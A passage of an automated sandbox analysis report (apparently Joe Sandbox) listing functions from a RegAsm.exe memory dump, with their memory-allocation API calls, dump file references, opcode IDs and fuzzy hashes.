                                                                                    • Opcode Fuzzy Hash: e32d3f264276b14c6a8e714e6c4ce615e44a085b04a7d7aaa2594296f9af6e7f
                                                                                    • Instruction Fuzzy Hash: 4D5136B6711A548BEB04EE25C500A2677E6FB82B38B25C13AD86597F80DB30E80187C0
                                                                                    Function 6C7259C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C6FE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C725A47
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C6FE56A,?,|UrlbarCSSSpan), ref: 6C725A5C
                                                                                    • free.MOZGLUE(?), ref: 6C725A97
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C725B9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$mallocmemset
                                                                                    • String ID:
                                                                                    • API String ID: 2682772760-0
                                                                                    • Opcode ID: 3050c8fdff8295b8ba914b0168117a8f99c766d38fb1c8187a600aa3115a8b75
                                                                                    • Instruction ID: cb02cc685487cdf6a846e27e15639882ff0af5540a5029b364ba25c8d79612ff
                                                                                    • Opcode Fuzzy Hash: 3050c8fdff8295b8ba914b0168117a8f99c766d38fb1c8187a600aa3115a8b75
                                                                                    • Instruction Fuzzy Hash: 4A516C705087409FD740CF28D9C161ABBF5FF8A318F04C96EE8899B646D778D944CB62
                                                                                    Function 6C71B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C71B2C9,?,?,?,6C71B127,?,?,?,?,?,?,?,?,?,6C71AE52), ref: 6C71B628
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C7190FF
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C719108
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C71B2C9,?,?,?,6C71B127,?,?,?,?,?,?,?,?,?,6C71AE52), ref: 6C71B67D
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C71B2C9,?,?,?,6C71B127,?,?,?,?,?,?,?,?,?,6C71AE52), ref: 6C71B708
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C71B127,?,?,?,?,?,?,?,?), ref: 6C71B74D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 6f51a42cb0a801bfe551c920bdf2e57b0e6806818c65c35996cd608fde9965e3
                                                                                    • Instruction ID: 7f2fddaa003840db879fd521ea0f07be0152236aba7f9c852f9d594c3829ee2f
                                                                                    • Opcode Fuzzy Hash: 6f51a42cb0a801bfe551c920bdf2e57b0e6806818c65c35996cd608fde9965e3
                                                                                    • Instruction Fuzzy Hash: 5651D4F1A092168FDB14CF28CA8475EB7B5FF49305F59852EC856A7B11D731B804CBA1
                                                                                    Function 6C71DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C70FF2A), ref: 6C71DFFD
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C7190FF
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C719108
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C70FF2A), ref: 6C71E04A
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C70FF2A), ref: 6C71E0C0
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C70FF2A), ref: 6C71E0FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 7933647992c59db80bca6eca4dafb3ed924e47acccffc1ad1b4d2d06149fa5bd
                                                                                    • Instruction ID: 1fdf80d256ddfef3e7bc22570dc71b3c5f312dff79af4ccbcf341b1c885693d0
                                                                                    • Opcode Fuzzy Hash: 7933647992c59db80bca6eca4dafb3ed924e47acccffc1ad1b4d2d06149fa5bd
                                                                                    • Instruction Fuzzy Hash: 7D41D4B160820A8FEB14CF68CA8435E73B2BB45308F2D4539D556DBF41E732E905CBA2
                                                                                    Function 6C716E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C716EAB
                                                                                    • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C716EFA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C716F1E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C716F5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc$freememcpy
                                                                                    • String ID:
                                                                                    • API String ID: 4259248891-0
                                                                                    • Opcode ID: 499b74ea4c0f937561fbd6046930633301652a75b16e8ba6d92ad0ee87836f0f
                                                                                    • Instruction ID: 742806e055a1f3dcb15149b05868d4f11460ead6f41dc9db0ac86849fcfbf4dc
                                                                                    • Opcode Fuzzy Hash: 499b74ea4c0f937561fbd6046930633301652a75b16e8ba6d92ad0ee87836f0f
                                                                                    • Instruction Fuzzy Hash: C031E771A1460A8FDB04CF2CCE406AA73EDFB84305F548239D41AC7A61EB31E659C7A0
                                                                                    Function 6C72B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C6D0A4D), ref: 6C72B5EA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C6D0A4D), ref: 6C72B623
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C6D0A4D), ref: 6C72B66C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C6D0A4D), ref: 6C72B67F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc$free
                                                                                    • String ID:
                                                                                    • API String ID: 1480856625-0
                                                                                    • Opcode ID: e906c06632f40bb3ce69b36a802506ecd3f6501474bca7b08db6c27144fb0aed
                                                                                    • Instruction ID: 9f3990d580deb3525ab1da07e375ef1d601240b01ba6c1df7a66bd5f5a2a8873
                                                                                    • Opcode Fuzzy Hash: e906c06632f40bb3ce69b36a802506ecd3f6501474bca7b08db6c27144fb0aed
                                                                                    • Instruction Fuzzy Hash: C231F471A002168FDB10DF68C944A5ABBB5FF80305F1A857AC8179B211DB35F915CBA1
                                                                                    Function 6C6FF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C6FF611
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6FF623
                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C6FF652
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6FF668
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3510742995-0
                                                                                    • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                    • Instruction ID: 5d8f98b3ecbf1bda9c0c7852c1e9f49d0163ae472f56b4525ef4823fc38e83fc
                                                                                    • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                    • Instruction Fuzzy Hash: A1316F71A00224AFCB14CF2DCCC4A9F77F6EB94354B148538FA598BB05D631E945CB95
                                                                                    Function 6C6DB940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6DB96F
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C6DB99A
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6DB9B0
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6DB9B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3313557100-0
                                                                                    • Opcode ID: ed109c27f1ca70179d5eeceadf1b9e57eef4a3adfb2f378d8b895fde0a29aed7
                                                                                    • Instruction ID: b17e86e85fd9cca8e13f9fb80b29c13965112f525bb24a8dba04e4ae02719fa8
                                                                                    • Opcode Fuzzy Hash: ed109c27f1ca70179d5eeceadf1b9e57eef4a3adfb2f378d8b895fde0a29aed7
                                                                                    • Instruction Fuzzy Hash: 1611ACB1A002159FCB04DF69DC848ABB7F8BF98304B14853AE91AD7301E731A9098AA1
                                                                                    Function 6C7126B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free
                                                                                    • String ID:
                                                                                    • API String ID: 1294909896-0
                                                                                    • Opcode ID: 4f6dc11650bb138c8c710571b58d91105961ae96d31e2712763e930c73edeeb3
                                                                                    • Instruction ID: d12ae484c45080c8806240e31b7bf2cdba3584a77214820ea1a8bb66f3a39d0d
                                                                                    • Opcode Fuzzy Hash: 4f6dc11650bb138c8c710571b58d91105961ae96d31e2712763e930c73edeeb3
                                                                                    • Instruction Fuzzy Hash: D9F02DB27052005BE7109E18DC8495B73ADEF5731DB180035EA16D3F12E332F919C7A5